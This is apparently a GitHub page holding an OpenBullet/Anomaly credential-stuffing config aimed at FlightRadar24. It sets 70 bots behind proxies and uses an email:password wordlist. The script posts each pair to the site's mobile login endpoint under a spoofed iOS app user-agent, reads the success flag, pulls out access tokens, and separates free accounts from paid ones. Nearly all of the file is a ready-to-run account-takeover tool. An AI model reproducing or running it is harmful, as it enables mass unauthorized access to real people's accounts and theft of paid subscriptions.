-
Notifications
You must be signed in to change notification settings - Fork 11
/
[CT] - Flightradar24.com.anom
76 lines (69 loc) · 1.96 KB
/
[CT] - Flightradar24.com.anom
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
[SETTINGS]
{
"Name": "FlightRadar24.com",
"SuggestedBots": 70,
"MaxCPM": 0,
"LastModified": "2022-07-04T21:50:32.0318505+03:00",
"AdditionalInfo": "",
"Author": "KaraMeleKk",
"Version": "1.4.4 [Anomaly]",
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"CaptchaUrl": "",
"Base64": "",
"Grayscale": false,
"RemoveLines": false,
"RemoveNoise": false,
"Dilate": false,
"Threshold": 1.0,
"DiffKeep": 0.0,
"DiffHide": 0.0,
"Saturate": false,
"Saturation": 0.0,
"Transparent": false,
"Contour": false,
"OnlyShow": false,
"ContrastGamma": false,
"Contrast": 1.0,
"Gamma": 1.0,
"Brightness": 1.0,
"RemoveLinesMin": 0,
"RemoveLinesMax": 0,
"Crop": false,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}
[SCRIPT]
FUNCTION URLEncode "<USER>" -> VAR "US"
REQUEST POST "https://mobile.flightradar24.com/mobile/login?device=ios"
CONTENT "email=<US>&password=<PASS>&remember=true"
CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8"
HEADER "content-type: application/x-www-form-urlencoded; charset=UTF-8"
HEADER "user-agent: FlightradarFree/2022051301 CFNetwork/1329 Darwin/21.3.0"
KEYCHECK
KEYCHAIN Failure OR
KEY "success\":false"
KEYCHAIN Success OR
KEY "success\":true"
#token1 PARSE "<SOURCE>" JSON "accessToken" -> VAR "token1"
#logintoken PARSE "<SOURCE>" JSON "tokenLogin" -> VAR "logintoken"
KEYCHECK
KEYCHAIN Custom "FREE" OR
KEY "\"accountType\":\"free"
KEYCHAIN Success OR
KEY "<SOURCE>" DoesNotContain "\",\"accountType\":\"free"